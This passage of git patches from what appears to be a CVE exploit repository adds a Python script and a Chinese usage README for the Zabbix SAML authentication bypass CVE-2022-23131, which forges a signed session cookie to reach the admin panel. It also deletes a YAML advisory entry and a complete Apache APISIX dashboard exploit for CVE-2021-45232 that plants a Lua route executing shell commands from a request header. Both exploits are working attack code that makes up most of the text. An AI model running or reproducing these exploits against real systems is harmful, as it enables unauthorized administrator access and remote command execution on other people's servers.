-
+import requests
+import re
+import urllib.parse
+import base64
+import json
+import sys
+ 
+def exp(target, username):
+	resp = requests.get(url=target, verify=False)
+	cookie = resp.headers.get("Set-Cookie")
+
+	zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
+
+	url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
+	base64_decode_data = base64.b64decode(url_decode_data)
+
+	decode_to_str = str(base64_decode_data, encoding='utf-8')
+
+	to_json = json.loads(decode_to_str)
+
+	tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
+
+	payloadJson = json.dumps(tmp_ojb)
+	print("decode_payload:", payloadJson)
+
+	payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
+	print("zbx_signed_session:", payload)
+
+
+if __name__ == "__main__":
+	if len(sys.argv) != 3:
+		print("argv error")
+		exit(0)
+	target = sys.argv[1]
+	username = sys.argv[2]
+
 	exp(target, username)
\ No newline at end of file
diff --git a/cve/zabbix/2022/CVE-2022-23131/README.md b/cve/zabbix/2022/CVE-2022-23131/README.md
index bd13b10a..4fabab8c 100644
--- a/cve/zabbix/2022/CVE-2022-23131/README.md
+++ b/cve/zabbix/2022/CVE-2022-23131/README.md
@@ -1,4 +1,4 @@
-CVE-2022-23131 
-使用方式：python3 CVE-2022-23131.py target Admin 
-其中，target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆，即可直接进入管理界面
-
+CVE-2022-23131 
+使用方式：python3 CVE-2022-23131.py target Admin 
+其中，target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆，即可直接进入管理界面
+
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml  b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml 
deleted file mode 100644
index 0eab256c..00000000
--- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml 	
+++ /dev/null
@@ -1,20 +0,0 @@
-id: CVE-2022-23131
-source: 
-  https://github.com/L0ading-x/cve-2022-23131
-info:
-  name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统，基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
-  severity: critical
-  description: 在启用 SAML SSO 身份验证（非默认）的情况下，恶意行为者可以修改会话数据，因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击，需要启用 SAML 身份验证，并且攻击者必须知道 Zabbix 用户的用户名（或使用默认情况下禁用的来宾帐户）。
-  scope-of-influence:
-    Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
-    - https://www.secpulse.com/archives/179601.html
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2022-23131
-    cwe-id: CWE-290
-    cnvd-id: None
-    kve-id: None
-  tags: 前端认证绕过漏洞
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index fc7663c8..226fdef9 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -29,6 +29,8 @@ cve:
     - CVE-2021-1056
   java-spring-cloud-gateway:
     - CVE-2022-22947
+  java-spring-security:
+    - CVE-2022-22978
   apache-commons-text:
     - CVE-2022-42889
   unzip:
-- 
Gitee


From 7e602f80c855cc07036ec0e84f6cc7476f4ddc08 Mon Sep 17 00:00:00 2001
From: Zhangqichen131 <qczhang@buaa.edu.cn>
Date: Thu, 6 Apr 2023 09:44:17 +0000
Subject: [PATCH 2/2] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?=
 =?UTF-8?q?Apache-APISIX/2021/cve-2021-45232/apisix=5Fdashboard=5Frce.py?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../cve-2021-45232/apisix_dashboard_rce.py    | 93 -------------------
 1 file changed, 93 deletions(-)
 delete mode 100644 cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py

diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
deleted file mode 100644
index 30ebcda5..00000000
--- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
+++ /dev/null
@@ -1,93 +0,0 @@
-#!/usr/bin/env python3
-import zlib
-import json
-import random
-import requests
-import string
-import sys
-from urllib3.exceptions import InsecureRequestWarning
-
-# Suppress only the single warning from urllib3 needed.
-requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
-
-
-eval_config = {
-    "Counsumers": [],
-    "Routes": [
-        {
-            "id": str(random.randint(100000000000000000, 1000000000000000000)),
-            "create_time": 1640674554,
-            "update_time": 1640677637,
-            "uris": [
-                "/rce"
-            ],
-            "name": "rce",
-            "methods": [
-                "GET",
-                "POST",
-                "PUT",
-                "DELETE",
-                "PATCH",
-                "HEAD",
-                "OPTIONS",
-                "CONNECT",
-                "TRACE"
-            ],
-            "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
-            "status": 1
-        }
-    ],
-    "Services": [],
-    "SSLs": [],
-    "Upstreams": [],
-    "Scripts": [],
-    "GlobalPlugins": [],
-    "PluginConfigs": []
-}
-
-
-def random_str():
-    return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
-
-
-def calc_crc(data):
-    crc32 = zlib.crc32(data) & 0xffffffff
-    return crc32.to_bytes(4, byteorder="big")
-
-
-def export_data(url):
-    r = requests.get(url + "/apisix/admin/migrate/export", verify=False)
-    return r.text[:-4]
-
-
-def import_data(url, data):
-    data = json.dumps(data).encode()
-    crc32 = calc_crc(data)
-
-    files = {"file": ("data", data + crc32, "text/data")}
-    resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False)
-    # print(resp.text)
-    if resp.json().get("code", -1) == 0:
-        return True
-    else:
-        return False
-
-
-if __name__ == "__main__":
-    if len(sys.argv) != 2:
-        print("python " + sys.argv[0] + " http://127.0.0.1:9000")
-        exit()
-    
-    url = sys.argv[1]
-    if url.endswith("/"):
-        url = url[:-1]
-
-    uri = random_str()
-    eval_config["Routes"][0]["uris"] = [ "/" + uri]
-    eval_config["Routes"][0]["name"] = uri
-
-    if import_data(url, eval_config):
-        print("attack success")
-        print("uri is: " + "/" + uri)
-    else:
-        print("attack error")
\ No newline at end of file
-- 
Gitee